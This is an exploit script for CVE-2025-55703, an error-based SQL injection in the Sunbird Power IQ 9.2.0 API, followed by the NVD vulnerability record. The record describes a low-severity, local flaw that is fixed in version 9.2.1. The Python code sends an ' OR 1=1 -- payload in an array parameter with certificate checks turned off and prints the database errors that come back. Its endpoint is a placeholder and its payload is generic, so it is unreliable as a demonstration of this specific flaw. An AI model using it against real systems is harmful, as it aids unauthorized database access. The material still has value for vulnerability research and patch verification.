CVE-2025-55703

import requests import json # CVE-2025-55703 PoC - Sunbird Power IQ SQL Injection # Target: Sunbird Power IQ 9.2.0 API # Vulnerability: Error-based SQL injection in outdated API endpoint TARGET_URL = "https://target-host/api/v1/endpoint" def exploit_sql_injection(): """ Exploit error-based SQL injection in Sunbird Power IQ 9.2.0 Requires: Local access, authenticated session, user interaction """ headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer <session_token>' } # Payload: Array parameter with SQL injection # The API endpoint applies arrays without proper input validation payload = { 'param': [ "legitimate_value", "' OR 1=1 -- " ] } try: response = requests.post( TARGET_URL, headers=headers, json=payload, verify=False, timeout=30 ) # Extract database error information from response if response.status_code == 500: error_data = response.json() print(f"Error details: {error_data}") return error_data else: print(f"Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None if __name__ == "__main__": print("CVE-2025-55703 - Sunbird Power IQ SQL Injection PoC") result = exploit_sql_injection()

{"cve": {"id": "CVE-2025-55703", "sourceIdentifier": "[email protected]", "published": "2025-12-15T20:15:51.607", "lastModified": "2025-12-30T20:28:27.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An error-based SQL injection vulnerability exists in the Sunbird Power IQ 9.2.0 API. The vulnerability is due to an outdated API endpoint that applied arrays without proper input validation. This can allow attackers to manipulate SQL queries. This has been addressed in Power IQ version 9.2.1, where the API call code was updated to ensure safe handling of input values."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sunbirddcim:power_iq:9.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EA55692C-4E93-4DEE-9BA5-D643A10CD0F8"}]}]}], "references": [{"url": "https://pastebin.com/C6hVPpF4", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sunbirddcim.com/", "source": "[email protected]", "tags": ["Product"]}]}}